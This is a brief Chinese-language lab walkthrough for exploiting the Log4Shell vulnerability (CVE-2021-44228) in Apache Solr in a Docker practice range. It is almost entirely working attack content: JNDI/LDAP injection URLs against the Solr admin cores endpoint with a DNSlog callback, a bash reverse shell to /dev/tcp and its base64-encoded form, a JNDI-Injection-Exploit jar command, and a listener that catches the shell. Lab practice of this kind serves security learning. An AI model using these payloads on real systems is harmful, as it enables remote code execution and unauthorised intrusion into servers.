输入systemctl start docker启动docker
进入到CVE-2021-44228
输入docker-compose up -d开启环境
输入docker ps查看开启环境的端口
去访问靶场
打开dnslog平台,获取一个域名来监控我们所获得的内容
访问http://8.155.8.255:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.xxv6yg.dnslog.cn}
也可以输入/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.xxv6yg.dnslog.cn:9999/aaa}
或者${jndi:ldap://${sys:java.version}.xxv6yg.dnslog.cn:9999/aaa}
发现了版本
我们把这条语句bash -i >& /dev/tcp/8.155.8.255/6666 0>&1
用64编码加密YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS44LjI1NS82NjY2IDA+JjE=
我们输入
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS44LjI1NS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -A "8.155.8.255"
我们再打开一个终端,开启监听
再用上面的恶意代码类1.8的ldap复制下来去访问
输入http://8.155.8.255:8983/solr/admin/cores?action=${jndi:ldap://8.155.8.255:1389/absizn}
回到监听
弹到了shell